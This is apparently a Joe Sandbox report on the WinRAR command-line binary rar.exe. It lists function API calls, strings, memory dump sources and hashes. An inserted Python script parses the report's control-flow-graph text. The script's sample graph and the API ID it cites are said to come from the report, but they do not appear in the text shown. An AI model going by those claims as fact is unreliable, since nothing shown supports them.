• Instruction Fuzzy Hash: 5851B436B0A641D7EA65DF21E51437A6361FF54B84F040176DE8E87AA0DF3CE94BC600

Control-flow Graph
(rendered graph not captured; the following is recovered from its node labels) 17 basic blocks spanning 7ff6aa1a1e80-7ff6aa1a204b, entry block 7ff6aa1a1e80, single exit block 7ff6aa1a2027. Blocks with API calls, in address order: 7ff6aa1a1ecb CreateFileW; 7ff6aa1a1f59 GetLastError, call 7ff6aa1b4534; 7ff6aa1a1f78 CreateFileW, GetLastError; 7ff6aa1a1fd9 SetFileTime. Other internal call targets: 7ff6aa1da5a0 (block 7ff6aa1a1e80), 7ff6aa1ca9e8 (block 7ff6aa1a2011), 7ff6aa1da610 (block 7ff6aa1a2027).
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0
• Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
• Instruction ID: 0322803119e0d9ec8141d03b6b85cd74aff26cb3e3715ef3dd37e94b2b89c721
• Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
• Instruction Fuzzy Hash: E0416872A0A68196FB618B24E4047B966A1AB447B8F00033ADE7D876C4DF7CC84ACB40
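
The control_flow_graph lines Joe Sandbox prints for this function and the one before it are the graph export flattened to text: a decimal node id, the block's address or address range, any API names or "call <address>" labels on that block, and "src->dst" edges. The Python below is an added example and is not part of the Joe Sandbox report or of its IDA plugin. It parses that text back into blocks and edges and summarizes the function: entry and exit blocks, imported APIs in address order, internal call targets, and blocks unreachable from the entry. The token grammar is inferred from the lines as printed (an assumption, not a documented format), the sample input is the first graph copied verbatim, and the Executed/Not Executed colouring is not recoverable from the text, so no coverage is attempted.

```python
"""Parse a Joe Sandbox control_flow_graph text line and summarize the function."""
import re
from dataclasses import dataclass, field

# Sample input: the control_flow_graph line of the rar.exe function at
# 7ff6aa1a2574, copied verbatim from this report (test data for the parser).
SAMPLE = (
    "control_flow_graph 1858 7ff6aa1a2574-7ff6aa1a259c 1859 7ff6aa1a259e-7ff6aa1a25a0 "
    "1858->1859 1860 7ff6aa1a25a5-7ff6aa1a25a9 1858->1860 1861 7ff6aa1a273a-7ff6aa1a2756 "
    "1859->1861 1862 7ff6aa1a25ab-7ff6aa1a25b6 GetStdHandle 1860->1862 "
    "1863 7ff6aa1a25ba-7ff6aa1a25c6 1860->1863 1862->1863 "
    "1864 7ff6aa1a2619-7ff6aa1a2637 WriteFile 1863->1864 1865 7ff6aa1a25c8-7ff6aa1a25cd "
    "1863->1865 1866 7ff6aa1a263b-7ff6aa1a263e 1864->1866 "
    "1867 7ff6aa1a25cf-7ff6aa1a2609 WriteFile 1865->1867 1868 7ff6aa1a2644-7ff6aa1a2648 "
    "1865->1868 1866->1868 1869 7ff6aa1a2733-7ff6aa1a2737 1866->1869 1867->1868 "
    "1871 7ff6aa1a260b-7ff6aa1a2615 1867->1871 1868->1869 1870 7ff6aa1a264e-7ff6aa1a2652 "
    "1868->1870 1869->1861 1870->1869 1872 7ff6aa1a2658-7ff6aa1a2692 GetLastError "
    "call 7ff6aa1a3144 SetLastError 1870->1872 1871->1867 1873 7ff6aa1a2617 1871->1873 "
    "1878 7ff6aa1a2694-7ff6aa1a26a2 1872->1878 1879 7ff6aa1a26bc-7ff6aa1a26d0 "
    "call 7ff6aa19c95c 1872->1879 1873->1866 1878->1879 1880 7ff6aa1a26a4-7ff6aa1a26ab "
    "1878->1880 1880->1879 1883 7ff6aa1a26ad-7ff6aa1a26b7 call 7ff6aa19cf34 1880->1883 "
    "1883->1879 1884 7ff6aa1a2721-7ff6aa1a272e call 7ff6aa19cf14 1879->1884 "
    "1885 7ff6aa1a26d2-7ff6aa1a26db 1879->1885 1884->1869 1885->1863 "
    "1887 7ff6aa1a26e1-7ff6aa1a26e3 1885->1887 1887->1863 "
    "1889 7ff6aa1a26e9-7ff6aa1a271c 1887->1889 1889->1863"
)

NODE_ID = re.compile(r"^\d+$")                              # graph node ids are decimal
ADDR = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")  # "start-end" or a lone address


@dataclass
class Block:
    node: str
    start: int
    end: int
    apis: list = field(default_factory=list)   # imported API names on the block label
    calls: list = field(default_factory=list)  # targets of "call <addr>" labels


def parse_cfg(text):
    """Return ({node_id: Block}, [(src, dst), ...]) from one flattened graph line."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                      # edge "src->dst"; labels never follow an edge
            src, dst = tok.split("->", 1)
            edges.append((src, dst))
            cur, i = None, i + 1
        elif NODE_ID.match(tok):             # node id, immediately followed by its address
            m = ADDR.match(tokens[i + 1]) if i + 1 < len(tokens) else None
            if not m:
                raise ValueError(f"node {tok} has no address token")
            start = int(m.group(1), 16)
            end = int(m.group(2), 16) if m.group(2) else start
            cur = blocks[tok] = Block(tok, start, end)
            i += 2
        elif cur is None:
            raise ValueError(f"label {tok!r} outside a node definition")
        elif tok == "call":                  # "call <hex target>": intra-module call
            cur.calls.append(int(tokens[i + 1], 16))
            i += 2
        else:                                # any other label token is an imported API
            cur.apis.append(tok)
            i += 1
    return blocks, edges


def analyze(text):
    """Summarize one function graph: shape, API order, internal calls, dead blocks."""
    blocks, edges = parse_cfg(text)
    incoming, succ = {}, {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
        incoming[dst] = incoming.get(dst, 0) + 1
    entry = [n for n in blocks if incoming.get(n, 0) == 0]
    exits = [n for n in blocks if not succ.get(n)]
    seen, stack = set(entry), list(entry)    # depth-first walk from the entry block(s)
    while stack:
        for d in succ.get(stack.pop(), []):
            if d not in seen:
                seen.add(d)
                stack.append(d)
    by_addr = sorted(blocks.values(), key=lambda b: b.start)
    return {
        "range": (hex(by_addr[0].start), hex(max(b.end for b in by_addr))),
        "blocks": len(blocks),
        "edges": len(edges),
        "entry": entry,
        "exits": exits,
        "unreachable": sorted(set(blocks) - seen),
        "api_trace": [(hex(b.start), a) for b in by_addr for a in b.apis],
        "api_set": sorted({a for b in by_addr for a in b.apis}),
        "internal_calls": sorted({hex(c) for b in by_addr for c in b.calls}),
    }


if __name__ == "__main__":
    info = analyze(SAMPLE)
    print(f"function {info['range'][0]}-{info['range'][1]}: {info['blocks']} blocks, "
          f"{info['edges']} edges, entry {info['entry']}, exits {info['exits']}")
    for addr, api in info["api_trace"]:
        print(f"  {addr}  {api}")
    print("  internal calls:", ", ".join(info["internal_calls"]))
    print("  unreachable blocks:", info["unreachable"] or "none")
```

Running the file prints the block range, the single exit block and the API sequence GetStdHandle, WriteFile, WriteFile, GetLastError, SetLastError; the api_set it recovers can be checked against the API ID row (ErrorFileLastWrite$Handle) that Joe Sandbox derives for the same function. Feeding it the next function's line gives the CreateFileW / GetLastError / CreateFileW / SetFileTime sequence in the same way.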

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: rar.ini$switches=$switches_%ls=
• API String ID: 233258989-2235180025
• Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
• Instruction ID: 7ea973c71a602197774d9dc10188e8e3576a759b385ee162f2322f7bdece65f1
• Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
• Instruction Fuzzy Hash: 0341932171A682E1EB12DF21D9111F963A0EF447A4F840577EA6E83AD6EF3CED56C310

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
• String ID: rar.lng
• API String ID: 553376247-2410228151

Control-flow Graph

APIs
• SHGetMalloc.SHELL32(?,00000800,?,00007FF6AA1B4432,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B40C4
• SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B40DF
• SHGetPathFromIDListW.SHELL32 ref: 00007FF6AA1B40F1
  • Part of subcall function 00007FF6AA1A3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6AA1B413F,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1A34A0
  • Part of subcall function 00007FF6AA1A3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6AA1B413F,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1A34D5
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Similarity
• API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
• String ID: WinRAR
• API String ID: 977838571-3970807970
APIs
• GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF6AA1E3CEF,?,?,00000000,00007FF6AA1E3CAA,?,?,00000000,00007FF6AA1E3FD9), ref: 00007FF6AA1E97A5
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6AA1E3CEF,?,?,00000000,00007FF6AA1E3CAA,?,?,00000000,00007FF6AA1E3FD9), ref: 00007FF6AA1E9807
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6AA1E3CEF,?,?,00000000,00007FF6AA1E3CAA,?,?,00000000,00007FF6AA1E3FD9), ref: 00007FF6AA1E9841
• FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6AA1E3CEF,?,?,00000000,00007FF6AA1E3CAA,?,?,00000000,00007FF6AA1E3FD9), ref: 00007FF6AA1E986B
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$Free
• String ID:
• API String ID: 1557788787-0
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: AFUM$default.sfx
                                                                                                                                                                                                                                        • API String ID: 0-2491287583
                                                                                                                                                                                                                                        • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                        • Instruction ID: 5e4f54c7e227e63aab325ca0c8e89fc58494672f4bee454c8433ce548f76b5ad
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E881C521F0E692E4EB729B11D2502BD23A1AF51784F4480B7DE8D876C6DF2DAC97C790
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                        • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                        • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                        • Instruction ID: f96b8c910bdf23134e73637c7d7694e6e8cb06ce7a0a1bcd6ef186cdb20e451b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D21B632A29782D1EB718B259490139A755FB5AB74FA81377DA7E46BD4CE38DC83C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                        • String ID: CreateThread failed
                                                                                                                                                                                                                                        • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                        • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                        • Instruction ID: 2af3ee0e3225a0bd60c526d00dd9bac403028449397f8032f5ed86b84025c62b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6111603190AA42E2E706DF11E9801B97360FF84B84F584077D69D83659EF3DE957C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3094578987-0
                                                                                                                                                                                                                                        • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                        • Instruction ID: bcdf6cb950674617f9b8f436a5b02b0123b9a6fe03a8bf8739e31c22c9e13b29
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BBF0A22660DA82D2EB619F22E58017C6360FF88B99F040172DE8D86269DE2CED06CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleFileHandleModeType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4141822043-0
                                                                                                                                                                                                                                        • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                        • Instruction ID: 01d8cb0c9c64001e91848d9abbd9f35ff921b4c2016e4958452776322702041f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E08C28E06642E2EA994721A86523803919F49B80F4410BADC0FCA750EE2C9D86C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                        • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                        • Instruction ID: e6803f71c1e06333793cf2ecbf22cdb30396aa77f82ca88ac128c8a425326f65
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20E01A24A0A745E2FEA9AB219C9137923926F85741F0454BECC0E87792DE3DAC0A8250
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
